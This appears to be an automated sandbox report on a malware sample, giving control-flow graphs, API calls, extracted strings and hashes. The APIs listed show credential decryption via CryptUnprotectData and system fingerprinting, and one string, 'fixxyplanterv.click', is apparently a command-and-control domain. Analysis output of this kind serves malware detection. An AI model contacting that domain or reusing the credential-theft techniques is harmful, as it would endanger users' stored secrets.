13806->13764 13807->13806 13809 43954c 13807->13809 13811 439e40 LdrInitializeThunk 13807->13811 13809->13806 13825 439e40 LdrInitializeThunk 13809->13825 13811->13807 13814 438cf0 13812->13814 13813 438d3e 13813->13764 13814->13813 13826 439e40 LdrInitializeThunk 13814->13826 13817 438a0a 13816->13817 13818 438a5e 13816->13818 13817->13818 13827 439e40 LdrInitializeThunk 13817->13827 13818->13769 13820->13773 13821->13794 13822->13799 13823->13801 13824->13807 13825->13806 13826->13813 13827->13818 13828->13777 13829->13783 13830->13786 13831->13788 13919 42cee6 CoSetProxyBlanket 13920 40cda5 CoInitializeSecurity 13921 40d866 13922 40d8d0 13921->13922 13924 439e40 LdrInitializeThunk 13922->13924 13924->13922 13925 415971 13926 415976 13925->13926 13927 43c550 LdrInitializeThunk 13926->13927 13928 41598f 13927->13928 13929 43c620 LdrInitializeThunk 13928->13929 13930 4159d0 13928->13930 13929->13930 13934 415a7e 13930->13934 13935 439e40 LdrInitializeThunk 13930->13935 13932 415c3b 13932->13932 13933 415c0a CryptUnprotectData 13933->13932 13934->13932 13934->13933 13935->13934 13936 42a7b2 13937 42a7b6 13936->13937 13938 42a8ee 13937->13938 13940 439e40 LdrInitializeThunk 13937->13940 13940->13938 13833 438612 13834 438622 13833->13834 13835 438620 13833->13835 13836 438627 RtlFreeHeap 13834->13836 13941 435530 13942 435555 13941->13942 13944 435624 13942->13944 13950 439e40 LdrInitializeThunk 13942->13950 13946 435705 13944->13946 13948 435801 13944->13948 13949 439e40 LdrInitializeThunk 13944->13949 13946->13948 13951 439e40 LdrInitializeThunk 13946->13951 13949->13944 13950->13942 13951->13946 13837 40cc16 CoInitializeEx CoInitializeEx 13838 433195 13842 43ba70 13838->13842 13841 4331df 13843 4331ad GetUserDefaultUILanguage 13842->13843 13843->13841 13844 40cdd7 13845 40cdf0 13844->13845 13848 435870 13845->13848 13847 40ce3b 13849 4358a0 CoCreateInstance 13848->13849 13851 435b21 SysAllocString 13849->13851 13852 435eeb 13849->13852 13855 435bb5 13851->13855 13854 435efb GetVolumeInformationW 13852->13854 13862 435f12 13854->13862 13856 435eda SysFreeString 13855->13856 13857 435bbd CoSetProxyBlanket 13855->13857 13856->13852 13858 435ed0 13857->13858 13859 435bdd SysAllocString 13857->13859 13858->13856 13861 435cd0 13859->13861 13861->13861 13863 435cf0 SysAllocString 13861->13863 13862->13847 13866 435d17 13863->13866 13864 435ebb SysFreeString SysFreeString 13864->13858 13865 435eb1 13865->13864 13866->13864 13866->13865 13867 435d5f VariantInit 13866->13867 13869 435db0 13867->13869 13868 435ea0 VariantClear 13868->13865 13869->13868 13952 43a7f4 13953 43a810 13952->13953 13954 43a85e 13953->13954 13959 439e40 LdrInitializeThunk 13953->13959 13958 439e40 LdrInitializeThunk 13954->13958 13957 43a926 13958->13957 13959->13954 13870 40e458 13876 409730 13870->13876 13872 40e45f CoUninitialize 13873 40e490 13872->13873 13874 40e7dc CoUninitialize 13873->13874 13875 40e800 13874->13875 13877 409744 13876->13877 13877->13872 13883 43a51d 13885 43a540 13883->13885 13884 43a58e 13885->13884 13887 439e40 LdrInitializeThunk 13885->13887 13887->13884

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 435870-435898 1 4358a0-4358ca 0->1 1->1 2 4358cc-4358e1 1->2 3 4358f0-435917 2->3 3->3 4 435919-43595f 3->4 5 435960-4359a1 4->5 5->5 6 4359a3-4359bf 5->6 8 4359c5-4359ce 6->8 9 435a7f-435a8a 6->9 10 4359d0-435a1e 8->10 11 435a90-435abb 9->11 10->10 12 435a20-435a31 10->12 11->11 13 435abd-435b1b CoCreateInstance 11->13 16 435a40-435a6f 12->16 14 435b21-435b55 13->14 15 435eeb-435f10 call 43ba70 GetVolumeInformationW 13->15 17 435b60-435b8e 14->17 22 435f12-435f16 15->22 23 435f1a-435f1c 15->23 16->16 19 435a71-435a7b 16->19 17->17 20 435b90-435bb7 SysAllocString 17->20 19->9 26 435eda-435ee7 SysFreeString 20->26 27 435bbd-435bd7 CoSetProxyBlanket 20->27 22->23 25 435f39-435f40 23->25 28 435f42-435f49 25->28 29 435f59-435f6f 25->29 26->15 32 435ed0-435ed6 27->32 33 435bdd-435bf5 27->33 28->29 30 435f4b-435f57 28->30 31 435f70-435f96 29->31 30->29 31->31 34 435f98-435fb5 31->34 32->26 35 435c00-435c4f 33->35 36 435fc0-43600b 34->36 35->35 37 435c51-435cc7 SysAllocString 35->37 36->36 38 43600d-436038 call 41d8b0 36->38 39 435cd0-435cee 37->39 43 436040-43604b 38->43 39->39 41 435cf0-435d1d SysAllocString 39->41 46 435d23-435d45 41->46 47 435ebb-435ecd SysFreeString * 2 41->47 43->43 45 43604d-436059 43->45 48 435f20-435f33 45->48 49 43605f-43606f call 408170 45->49 53 435eb1-435eb7 46->53 54 435d4b-435d4e 46->54 47->32 48->25 51 436074-43607b 48->51 49->48 53->47 54->53 56 435d54-435d59 54->56 56->53 57 435d5f-435da7 VariantInit 56->57 58 435db0-435dc4 57->58 58->58 59 435dc6-435dd0 58->59 60 435dd4-435dd6 59->60 61 435ea0-435ead VariantClear 60->61 62 435ddc-435de2 60->62 61->53 62->61 63 435de8-435df6 62->63 64 435e35 63->64 65 435df8-435dfd 63->65 66 435e37-435e5f call 407fd0 call 408e70 64->66 67 435e0c-435e10 65->67 78 435e61 66->78 79 435e66-435e72 66->79 69 435e12-435e1b 67->69 70 435e00 67->70 73 435e22-435e26 69->73 74 435e1d-435e20 69->74 72 435e01-435e0a 70->72 72->66 72->67 73->72 75 435e28-435e33 73->75 74->72 75->72 78->79 80 435e74 79->80 81 435e79-435e9c call 408000 call 407fe0 79->81 80->81 81->61
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435B0F
                                                                                                      • SysAllocString.OLEAUT32(0000D588), ref: 00435B91
                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BCF
                                                                                                      • SysAllocString.OLEAUT32(s%w'), ref: 00435C56
                                                                                                      • SysAllocString.OLEAUT32(s%w'), ref: 00435CF1
                                                                                                      • VariantInit.OLEAUT32(83828188), ref: 00435D64
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                      • String ID: /#$%$PQ$d)*+$s%w'
                                                                                                      • API String ID: 65563702-3008678497
                                                                                                      • Opcode ID: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
                                                                                                      • Instruction ID: 5414f25a513856cf292a94d973b8fe981ab4f01926d2cca0fa1231f3848f9231
                                                                                                      • Opcode Fuzzy Hash: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
                                                                                                      • Instruction Fuzzy Hash: 50220E71A087009BD710DF29C881B6BBBE5EFC9710F14892EF4959B391D738D90ACB86

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 96 40e458-40e482 call 409730 CoUninitialize 99 40e490-40e504 96->99 99->99 100 40e506-40e519 99->100 101 40e520-40e532 100->101 101->101 102 40e534-40e573 101->102 103 40e580-40e5b2 102->103 103->103 104 40e5b4-40e5be 103->104 105 40e5c0-40e5c8 104->105 106 40e5db-40e5e6 104->106 107 40e5d0-40e5d9 105->107 108 40e5e8-40e5e9 106->108 109 40e5fb-40e603 106->109 107->106 107->107 110 40e5f0-40e5f9 108->110 111 40e605-40e608 109->111 112 40e61b-40e626 109->112 110->109 110->110 113 40e610-40e619 111->113 114 40e628-40e62f 112->114 115 40e63d 112->115 113->112 113->113 116 40e630-40e639 114->116 117 40e640-40e64b 115->117 116->116 118 40e63b 116->118 119 40e65b-40e667 117->119 120 40e64d-40e64f 117->120 118->117 122 40e681-40e73f 119->122 123 40e669-40e66b 119->123 121 40e650-40e659 120->121 121->119 121->121 124 40e740-40e777 122->124 125 40e670-40e67d 123->125 124->124 126 40e779-40e794 124->126 125->125 127 40e67f 125->127 128 40e7a0-40e7b2 126->128 127->122 128->128 129 40e7b4-40e7ff call 40b7d0 call 409730 CoUninitialize 128->129 134 40e800-40e874 129->134 134->134 135 40e876-40e889 134->135 136 40e890-40e8a2 135->136 136->136 137 40e8a4-40e8e3 136->137 138 40e8f0-40e922 137->138 138->138 139 40e924-40e92e 138->139 140 40e930-40e938 139->140 141 40e94b-40e956 139->141 142 40e940-40e949 140->142 143 40e958-40e959 141->143 144 40e96b-40e973 141->144 142->141 142->142 145 40e960-40e969 143->145 146 40e975-40e978 144->146 147 40e98b-40e996 144->147 145->144 145->145 148 40e980-40e989 146->148 149 40e998-40e99f 147->149 150 40e9ad 147->150 148->147 148->148 151 40e9a0-40e9a9 149->151 152 40e9b0-40e9bb 150->152 151->151 153 40e9ab 151->153 154 40e9cb-40e9d7 152->154 155 40e9bd-40e9bf 152->155 153->152 156 40e9f1-40eab8 154->156 157 40e9d9-40e9db 154->157 158 40e9c0-40e9c9 155->158 160 40eac0-40eaf7 156->160 159 40e9e0-40e9ed 157->159 158->154 158->158 159->159 161 40e9ef 159->161 160->160 162 40eaf9-40eb17 160->162 161->156 163 40eb20-40eb32 162->163 163->163 164 40eb34-40eb4d call 40b7d0 163->164 166 40eb52-40eb75 164->166
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Uninitialize
                                                                                                      • String ID: 2t$Qv$[^Q$$fixxyplanterv.click$qy$vol,$yp
                                                                                                      • API String ID: 3861434553-2046213541
                                                                                                      • Opcode ID: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
                                                                                                      • Instruction ID: 4db51f1f72c5905ee0b1b22d732d3a9d787199a41c6fab9545acfa54408a17bb
                                                                                                      • Opcode Fuzzy Hash: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
                                                                                                      • Instruction Fuzzy Hash: E9120CB56047818FD325CF36C590622BFA2FF96304B1989ADC4D25FB92C739B816CB94

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 171 40cdd7-40cde7 172 40cdf0-40ce22 171->172 172->172 173 40ce24-40ce51 call 408850 call 435870 172->173 178 40ce60-40cea7 173->178 178->178 179 40cea9-40ceef 178->179 180 40cef0-40cf02 179->180 180->180 181 40cf04-40cf0c 180->181 182 40cf2b-40cf33 181->182 183 40cf0e-40cf12 181->183 185 40cf62 182->185 186 40cf35-40cf39 182->186 184 40cf20-40cf29 183->184 184->182 184->184 187 40cf65-40cf6d 185->187 188 40cf40-40cf49 186->188 189 40cf8d 187->189 190 40cf6f-40cf73 187->190 188->188 191 40cf4b 188->191 193 40cf90-40cf98 189->193 192 40cf80-40cf89 190->192 191->187 192->192 194 40cf8b 192->194 195 40cf9a-40cf9b 193->195 196 40cfab-40d05f 193->196 194->193 197 40cfa0-40cfa9 195->197 198 40d060-40d072 196->198 197->196 197->197 198->198 199 40d074-40d08f 198->199 200 40d090-40d0d8 199->200 200->200 201 40d0da-40d0f7 call 40b7d0 200->201 203 40d0fc-40d117 201->203
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 976E25EBFC839FDD5EC6468C5C963249$9n`$AVUF$VD}N$fixxyplanterv.click$nx}v$RT$Z&\
                                                                                                      • API String ID: 0-4289302229
                                                                                                      • Opcode ID: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
                                                                                                      • Instruction ID: d82674ca07e07c92295c7b8026b48e690f7d2c28deac3183c156c38ed5531bfa
                                                                                                      • Opcode Fuzzy Hash: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
                                                                                                      • Instruction Fuzzy Hash: 359136B0204B82DFD315CF2AC490262FFA2FF56304B28866DC4965BB95C779B816CF94

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 204 4227b0-42282f 205 422830-422872 204->205 205->205 206 422874-4228b2 205->206 208 4228c0-4228dd 206->208 208->208 209 4228df-4228e9 208->209 210 422a32-422a37 209->210 211 4228f0-4228f5 209->211 212 422a40-422a48 209->212 213 422941-42294a 209->213 214 422934-42293e call 407fe0 209->214 215 42294b-422953 209->215 216 42292c 209->216 210->212 219 4228f7-4228fc 211->219 220 4228fe 211->220 221 422a51 212->221 222 422a4a-422a4f 212->222 214->213 217 422955-42295a 215->217 218 42295c 215->218 216->214 225 422963-422992 call 407fd0 217->225 218->225 226 422901-422925 call 407fd0 219->226 220->226 227 422a58-422aef call 407fd0 221->227 222->227 234 4229a0-4229b2 225->234 226->210 226->212 226->213 226->214 226->215 226->216 235 422af0-422b2f 227->235 234->234 236 4229b4-4229bc 234->236 235->235 238 422b31-422b3c 235->238 239 4229e1-4229ec 236->239 240 4229be-4229c3 236->240 241 422b61-422b72 238->241 242 422b3e-422b45 238->242 244 422a11-422a1b call 43c3b0 239->244 245 4229ee-4229f1 239->245 243 4229d0-4229df 240->243 247 422b91-422bad GetLogicalDrives call 43c3b0 241->247 248 422b74-422b77 241->248 246 422b50-422b5f 242->246 243->239 243->243 253 422a20-422a2b 244->253 252 422a00-422a0f 245->252 246->241 246->246 255 422e03 247->255 256 422d10 247->256 258 422cf6 247->258 259 422d16 247->259 260 422bb4-422bbc 247->260 261 422bc4-422be8 247->261 262 422cfc-422d09 call 407fe0 247->262 263 422d1c-422d28 call 407fe0 247->263 250 422b80-422b8f 248->250 250->247 250->250 252->244 252->252 253->210 253->212 253->255 253->256 257 422d31-422dc6 253->257 253->258 253->259 253->260 253->261 253->262 253->263 266 422dd0-422de9 257->266 260->261 265 422bf0-422c32 261->265 262->256 263->257 265->265 270 422c34-422caf 265->270 266->266 271 422deb-422df3 call 420b10 266->271 272 422cb0-422cd6 270->272 275 422df8-422dfb 271->275 272->272 274 422cd8-422cf3 call 420970 272->274 274->258 275->255
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &*Jk$4)B$=>$|~
                                                                                                      • API String ID: 0-1009457168
                                                                                                      • Opcode ID: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
                                                                                                      • Instruction ID: 152786c77f951dd3dbca6d6113f2fe09001a096b4f0132f05b015a8fe36a5df1
                                                                                                      • Opcode Fuzzy Hash: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
                                                                                                      • Instruction Fuzzy Hash: 74F164B4A00215DFCB10CF68D9826ABBBB1FF85310F18826DD845AF355D378E942CB99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 278 420b10-420b55 call 43c210 281 421294-4212a4 278->281 282 420b5b-420bb8 call 414830 call 4385e0 278->282 287 420bba-420bbd 282->287 288 420be5-420be9 287->288 289 420bbf-420be3 287->289 290 420beb-420bf6 288->290 289->287 291 420bf8 290->291 292 420bfd-420c16 290->292 293 420cb5-420cb8 291->293 294 420c18 292->294 295 420c1d-420c28 292->295 296 420cba 293->296 297 420cbc-420cc1 293->297 298 420ca4-420ca9 294->298 295->298 299 420c2a-420c9a call 439e40 295->299 296->297 302 420cc7-420cd7 297->302 303 4211c9-421202 call 438600 297->303 300 420cab 298->300 301 420cad-420cb0 298->301 307 420c9f 299->307 300->293 301->290 305 420cd9-420cf6 302->305 313 421204-421207 303->313 308 420e96 305->308 309 420cfc-420d1b 305->309 307->298 311 420e9a-420e9d 308->311 312 420d1d-420d20 309->312 314 420ea5-420ebb call 4385e0 311->314 315 420e9f-420ea3 311->315 316 420d22-420d37 312->316 317 420d39-420d57 call 4212b0 312->317 318 421209-42122d 313->318 319 42122f-421233 313->319 334 420ebf-420eca 314->334 335 420ebd-420ed1 314->335 320 420ed3-420ed5 315->320 316->312 317->308 337 420d5d-420d86 317->337 318->313 323 421235-42123b 319->323 327 4211a3-4211a9 320->327 328 420edb-420f0c 320->328 324 42123f-421253 323->324 325 42123d 323->325 330 421257-42125d 324->330 331 421255 324->331 325->281 332 4211b5-4211b9 327->332 333 4211ab-4211b3 327->333 336 420f0e-420f11 328->336 338 421284-421287 330->338 339 42125f-42127f call 439e40 330->339 331->338 340 4211bb 332->340 333->340 342 4211bd-4211bf 334->342 335->320 343 420f13-420f86 336->343 344 420f88-420fc2 336->344 345 420d88-420d8b 337->345 349 421290-421292 338->349 350 421289-42128e 338->350 339->338 340->342 342->305 351 4211c5-4211c7 342->351 343->336 352 420fc9-420fcc 344->352 346 420db1-420dc8 call 4212b0 345->346 347 420d8d-420daf 345->347 361 420dd3-420df4 346->361 362 420dca-420dce 346->362 347->345 349->281 350->323 351->303 353 420ff4-420ff8 352->353 354 420fce-420ff2 352->354 357 420ffa-421005 353->357 354->352 359 421007 357->359 360 42100c-421025 357->360 363 4210d5-4210df 359->363 364 421027 360->364 365 42102c-421037 360->365 366 420df6 361->366 367 420df8-420e94 call 407fd0 call 4144a0 call 407fe0 361->367 362->311 371 4210e3-421102 363->371 372 4210e1 363->372 368 4210c4-4210c9 364->368 365->368 369 42103d-4210ba call 439e40 365->369 366->367 367->311 376 4210cb 368->376 377 4210cd-4210d0 368->377 380 4210bf 369->380 373 421104-421107 371->373 372->371 378 421131-42113a 373->378 379 421109-42112f 373->379 376->363 377->357 382 42113e-421142 378->382 383 42113c 378->383 379->373 380->368 386 421144-42114b 382->386 385 421174-421177 383->385 389 421179-42118a call 438600 385->389 390 42118c-421192 385->390 387 42115b-421164 386->387 388 42114d-421159 386->388 393 421166 387->393 394 421168-42116e 387->394 388->386 392 421194-421197 389->392 390->392 392->327 397 421199-4211a1 392->397 398 421170-421172 393->398 394->398 397->342 398->385
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID: !@$,$\$]$^$b
                                                                                                      • API String ID: 1279760036-3534480190
                                                                                                      • Opcode ID: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
                                                                                                      • Instruction ID: ebca42ed76a8c9da250c5dc1f0308dd38997bd67e4ab243a484973a2be5f2ac8
                                                                                                      • Opcode Fuzzy Hash: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
                                                                                                      • Instruction Fuzzy Hash: 7F22AE7160C3A08FD324CF28944036FBBE1AB96324F594A6EE5E5873D2D7798845CB4B

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 402 408920-40892e call 439940 405 408a83-408a85 ExitProcess 402->405 406 408934-40893b call 432b30 402->406 409 408941-408965 GetCurrentProcessId GetCurrentThreadId 406->409 410 408a7e call 439dc0 406->410 412 408967-408969 409->412 413 40896b-408a0d GetForegroundWindow 409->413 410->405 412->413 414 408a5a-408a72 call 409ba0 413->414 415 408a0f-408a58 413->415 414->410 418 408a74 call 40cbf0 414->418 415->414 420 408a79 call 40b7a0 418->420 420->410
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3118123366-0
                                                                                                      • Opcode ID: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
                                                                                                      • Instruction ID: 0d30fea2273658e8f12e1d2f8b086a2a35bf40361b224995e2d0f0fc3bd077a4
                                                                                                      • Opcode Fuzzy Hash: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
                                                                                                      • Instruction Fuzzy Hash: E6313833A043144FD308EF799D8621AF6D6ABC8350F06953EF8C8DB391DA749C05868A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 422 40aae0-40ab0f 423 40ab10-40ab54 422->423 423->423 424 40ab56-40ac53 423->424 425 40ac60-40ac74 424->425 425->425 426 40ac76-40ac8f 425->426 427 40ac90-40acc3 426->427 427->427 428 40acc5-40acda call 40b7d0 427->428 430 40acdf-40ace4 428->430 431 40ade7-40ade9 430->431 432 40acea-40acfb 430->432 433 40af7c-40af88 431->433 434 40ad00-40ad38 432->434 434->434 435 40ad3a-40ad3f 434->435 436 40ad40-40ad4c 435->436 437 40ad53-40ad57 436->437 438 40ad4e-40ad51 436->438 439 40af73-40af79 call 438600 437->439 440 40ad5d-40ad77 437->440 438->436 438->437 439->433 441 40ad80-40ad9d 440->441 441->441 443 40ad9f-40ada8 441->443 445 40adaa-40adb2 443->445 446 40adee-40adf2 443->446 449 40adc7-40adcc 445->449 447 40af71 446->447 448 40adf8-40ae18 446->448 447->439 450 40ae20-40ae52 448->450 449->447 451 40add2-40add9 449->451 450->450 452 40ae54-40ae5d 450->452 453 40addb-40addd 451->453 454 40addf 451->454 455 40ae99-40ae9b 452->455 456 40ae5f-40ae67 452->456 453->454 457 40adc0-40adc5 454->457 458 40ade1-40ade5 454->458 455->447 460 40aea1-40aeb4 455->460 459 40ae79-40ae7e 456->459 457->446 457->449 458->457 459->447 461 40ae84-40ae8b 459->461 462 40aec0-40af01 460->462 463 40ae91 461->463 464 40ae8d-40ae8f 461->464 462->462 465 40af03-40af0f 462->465 466 40ae70-40ae77 463->466 467 40ae93-40ae97 463->467 464->463 468 40af11-40af1d 465->468 469 40af43-40af45 465->469 466->455 466->459 467->466 471 40af27-40af2c 468->471 470 40af4f-40af6f call 40a820 469->470 470->439 471->447 472 40af2e-40af35 471->472 474 40af37-40af39 472->474 475 40af3b 472->475 474->475 477 40af20-40af25 475->477 478 40af3d-40af41 475->478 477->471 479 40af47-40af4d 477->479 478->477 479->447 479->470
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$/8=+$/8=+$KRST
                                                                                                      • API String ID: 0-1235365206
                                                                                                      • Opcode ID: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
                                                                                                      • Instruction ID: 157f1745fbdc77b4c2282c5122e8992570511c6dc21cebd8a3ce22f79508730e
                                                                                                      • Opcode Fuzzy Hash: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
                                                                                                      • Instruction Fuzzy Hash: AEC1277264C3504BD314CF6584516ABFBE3AFD1304F18883DE4E5AB381D639891AC797

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 431262-431343 call 414850 GetSystemMetrics * 2 489 43134a-4313db 481->489
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                      • Opcode ID: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
                                                                                                      • Instruction ID: bf2bc5d8e4d95e73b8fdb797fadfe66e5eac667f6d15a87326ad77e9f8a434e9
                                                                                                      • Opcode Fuzzy Hash: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
                                                                                                      • Instruction Fuzzy Hash: 665182B0D142099FDB40EFACD985A9EBBF0BB88310F114569E499E7350D734AD48CF96

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 492 415971-4159a4 call 407fe0 call 43c550 497 415a11-415a17 call 407fe0 492->497 498 4159f0-415a04 call 401000 492->498 499 4159ab-4159d8 call 407fd0 call 43c620 492->499 500 415a1a-415a2f 492->500 501 4159df 492->501 497->500 498->497 499->497 499->498 499->500 499->501 504 415a30-415a4a 500->504 501->498 504->504 508 415a4c-415a54 504->508 511 415a56-415a65 508->511 512 415a9a-415afb call 401a50 508->512 515 415a70-415a77 511->515 521 415b00-415b1a 512->521 516 415a80-415a86 515->516 517 415a79-415a7c 515->517 516->512 520 415a88-415a97 call 439e40 516->520 517->515 519 415a7e 517->519 519->512 520->512 521->521 523 415b1c-415b3c call 401d90 521->523 527 415ed0 523->527 528 415b43-415b47 523->528 529 415ea6-415eac call 407fe0 523->529 530 415ed6 523->530 531 415ee8-415f4f 523->531 532 415c3b-415c42 523->532 533 415edc-415ee5 call 407fe0 523->533 534 415eaf-415ec8 call 43ba70 523->534 539 415b50-415b56 528->539 529->534 540 415f50-415f74 531->540 537 415c50-415c58 532->537 533->531 534->527 537->537 544 415c5a-415c76 537->544 539->539 546 415b58-415b7e 539->546 540->540 541 415f76-415f9a call 401d90 540->541 541->527 541->529 541->530 541->531 541->532 541->533 541->534 550 415db3 544->550 551 415c7c-415c81 544->551 547 415b80-415b83 546->547 548 415b85 546->548 547->548 552 415b86-415b96 547->552 548->552 553 415db6-415def call 407fd0 550->553 551->553 557 415b98-415b9b 552->557 558 415b9d-415ba1 552->558 561 415df0-415e14 553->561 557->558 560 415ba4-415bc8 call 407fd0 557->560 558->560 567 415c86-415c93 560->567 568 415bce-415c34 call 43ba70 CryptUnprotectData 560->568 561->561 563 415e16-415e1e 561->563 565 415e41-415e51 563->565 566 415e20-415e25 563->566 571 415e83 565->571 572 415e53-415e61 565->572 570 415e30-415e3f 566->570 569 415cb4-415d04 call 41cce0 * 2 567->569 568->527 568->529 568->530 568->531 568->532 568->533 568->534 584 415ca0 569->584 585 415d06-415d1d call 41cce0 569->585 570->565 570->570 577 415e8a-415ea0 call 408de0 571->577 575 415e70-415e7f 572->575 575->575 579 415e81 575->579 577->529 579->577 586 415ca4-415cae 584->586 589 415d30-415d59 585->589 590 415d1f-415d27 585->590 586->568 586->569 589->586 591 415d5f-415d7b call 41cce0 589->591 590->586 591->586 594 415d81-415d96 591->594 594->584
                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415C24
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID: Q
                                                                                                      • API String ID: 834300711-3463352047
                                                                                                      • Opcode ID: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
                                                                                                      • Instruction ID: 334bc079e22fc92185ed06b095f9784487d9b1feb53ebf903c8272a05930d261
                                                                                                      • Opcode Fuzzy Hash: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
                                                                                                      • Instruction Fuzzy Hash: 0BE1F3B55483818FD720CF24C8917EFBBA2EFD5314F04493DE4898B252EB389985CB4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: &#$$}ji~
